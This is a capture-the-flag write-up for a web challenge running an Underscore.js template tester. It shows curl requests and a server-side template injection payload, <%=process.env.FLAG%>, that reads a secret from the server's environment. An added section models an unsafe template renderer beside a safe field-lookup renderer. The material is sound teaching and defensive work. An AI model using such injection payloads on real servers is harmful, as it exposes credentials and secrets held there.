In this problem, the challenge text just gave us a URL to the page, https://backdoor-web100.herokuapp.com/, which in turn linked to the source code on GitHub.
curl 'https://backdoor-web100.herokuapp.com/'
<html>
<head>
<title>Underscore Template Tester</title>
<style rel="stylesheet" type="text/cs" href="//cdnjs.cloudflare.com/ajax/libs/normalize/3.0.0/normalize.min.css"></style>
</head>
<body>
<h1>Underscore Template Tester</h1>
<form action="/templatize" method="POST">
<p>This app takes in JSON data and a template and mashes them together using underscore.js</p>
<textarea name="json" rows="10" cols="30" placeholder="Enter JSON data">{"package":"underscore_test","version": "2.9.12"}</textarea>
<br>
<textarea name="template" rows="10" cols="30" placeholder="Enter your template here">The name of the package is <%=package%> and its version is <%=version%></textarea>
<br>
<input type="submit" value="Convert!">
</form><br>
<p>Source code for this is available at https://github.com/backdoor-ctf/web100</p>
</body>
</html>
Querying the server with the default inputs, it behaves pretty much as expected: the placeholders are filled in from the JSON...
curl 'https://backdoor-web100.herokuapp.com/templatize' --data 'json=%7B%0D%0A%22package%22%3A%22underscore_test%22%2C%0D%0A%22version%22%3A+%222.9.12%22%0D%0A%7D%0D%0A&template=The+name+of+the+package+is+%3C%25%3Dpackage%25%3E+and+its+version+is+%3C%25%3Dversion%25%3E%0D%0A'
json={
"package":"underscore_test",
"version": "2.9.12"
}
&template=The name of the package is <%=package%> and its version is <%=version%>
The name of the package is underscore_test and its version is 2.9.12
Going back to the source code reveals a very interesting line in app.js though:
// development only
if ('development' == app.get('env')) {
  app.use(express.errorHandler());
}

if(!process.env.FLAG) {
  console.error("No flag in environment");
  process.exit(1);
}
So... the flag is stored in an environment variable on the server. Well, we control the template, and underscore evaluates `<%= %>` placeholders as JavaScript expressions on the server, so we have some code execution - let's try to expose it!
curl 'https://backdoor-web100.herokuapp.com/templatize' --data 'json=%7B%7D%0D%0A&template=%3C%25%3Dprocess.env.FLAG%25%3E'
json={}&template=<%=process.env.FLAG%>
16367694ede9faef0efec36845e18ceb
Flag: 16367694ede9faef0efec36845e18ceb
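Why the `<%= %>` placeholder hands the template author code execution, and how a server should treat user-supplied templates instead, as an added example (not part of the writeup or the web100 app; the unsafe renderer is a simplified model of expression-evaluating engines, not underscore's own implementation):

```javascript
// Simplified model of why compiling a user-supplied template is code execution
// (assumption: this mimics expression-evaluating engines; it is not underscore's
// own implementation), beside a renderer that treats the template as data only.

const PLACEHOLDER = /<%=([\s\S]*?)%>/g;
const IDENT = /^\s*([A-Za-z_$][\w$]*)\s*$/;

// UNSAFE: each <%= ... %> body is spliced into JavaScript source and compiled,
// so whoever controls the template runs code with the server's privileges
// (globals such as `process` are in scope).
function renderUntrusted(template, data) {
  const body = template.replace(PLACEHOLDER, (_, expr) => "' + (" + expr + ") + '");
  return new Function("data", "with (data) { return '" + body + "'; }")(data);
}

// Returns the field names a template references, or null if any placeholder
// holds something other than a bare identifier (member access, calls, operators).
function templateFields(template) {
  const fields = [];
  for (const m of template.matchAll(PLACEHOLDER)) {
    const id = IDENT.exec(m[1]);
    if (!id) return null;
    fields.push(id[1]);
  }
  return fields;
}

// SAFE: placeholders are looked up on the caller's own data object and nothing is
// ever compiled. Unknown fields are an error rather than a prototype walk, so
// <%=constructor%> and similar do not resolve to Function.
function renderSafe(template, data) {
  const fields = templateFields(template);
  if (fields === null) throw new Error("template may only reference data fields");
  for (const key of fields) {
    if (!Object.prototype.hasOwnProperty.call(data, key)) throw new Error("unknown field: " + key);
  }
  return template.replace(PLACEHOLDER, (_, inner) => String(data[inner.trim()]));
}
```

A request like the writeup's `<%=process.env.FLAG%>` is rejected by `templateFields` before anything is evaluated, while the benign default template still renders.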